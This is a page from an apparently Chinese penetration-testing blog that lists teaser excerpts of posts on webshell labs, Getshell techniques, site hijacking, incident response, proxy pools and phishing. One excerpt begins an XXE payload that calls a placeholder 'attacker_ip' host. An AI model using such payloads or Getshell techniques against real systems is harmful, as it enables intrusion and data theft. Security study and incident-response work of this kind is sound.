其他 第8页

2021-04-08hush阅读(1048)赞(0)

环境： Windows:  192.168.93.3 VPS：x.x.x.x ⼯具：CobaltStrike4.1、MSF、哥斯拉v2.92 实验场景DVWA靶场，通过靶场的上传漏洞位置，上传webshell 然后⽤冰蝎或者其他webshe...

2021-04-07hush阅读(516)赞(0)

攻击者在入侵网站后，常常会通过恶意劫持流量来获取收益，从而实现流量变现。有一些黑帽劫持的手法堪称防不胜防，正常的访问行为很难发现异常。今天给大家分享一下常见的网站劫持手法和排查思路。 我们可以按照基于不同隐藏目的的常见劫持手法，来做一个简单...

2021-04-06hush阅读(468)赞(0)

一台没有发布任何服务到公网的服务器，却有大量的账户登录失败记录，咋一看实在有点让人费解。我们需要做的就是，从繁杂的现象中，拔丝抽茧找到有价值的信息，进一步定位攻击来源，从根源上解决攻击问题。 01、攻击现象 一台内网服务器，Windows安...

2021-04-05hush阅读(479)赞(0)

在发现入侵事件时，基于入侵现象进行排查，结合日志进行关联分析，对未知情况作合理的猜测，还原攻击场景，找到漏洞根源，这是很重要的任务。 01、事件起因 入侵检测出现安全预警，发现内网服务器的java进程发现异常执行行为，存在Dnslog探测和...

2021-03-23hush阅读(1080)赞(0)

Getshell分为进管理员后台Getshell和不进后台Getshell，本文主要总结常见进后台Getshell和部分。 进后台Getshell 01 管理员后台直接Getshell 管理员后台直接上传Getshell，有时候带密码的We...

2021-03-21hush阅读(512)赞(0)

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建， 开...

2021-03-20hush阅读(928)赞(0)

前言 代理池是渗透测试中常用的工具,用来躲避各种各样的封IP的防火墙,也帮助自身隐藏踪迹。 大部分工具也支持代理选项,但少有支持代理池的.实际上,不需要修改工具去支持代理池,只需要弄一个中间层,在中间层搭建代理池,然后支持代理的工具就可以变...

2021-03-14hush阅读(548)赞(0)

记录渗透测试中常见的小Tips。 关于XXE漏洞的一些总结 XXE Payload: <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://attacker_ip:port/...

2021-03-12hush阅读(1784)赞(0)

在大型企业边界安全做的越来越好的情况下，不管是 APT 攻击还是红蓝对抗演练，钓鱼和水坑攻击被越来越多的应用。 一、邮件安全的三大协议 1.1 SPF SPF 是 Sender Policy Framework 的缩写，中文译为发送方策略框...

2021-03-10hush阅读(496)赞(0)

今天朋友突然告诉我，某转买手机被骗了1200块钱，心理一惊，果然不出所料，那我来试试吧。。 要来了诈骗网站地址，打开是这种： 果断收集一下信息：（由于留言骗子返还朋友钱款，暂时给他留点面子，打点马赛克） 查看端口，一猜就是宝塔面板搭建， 开...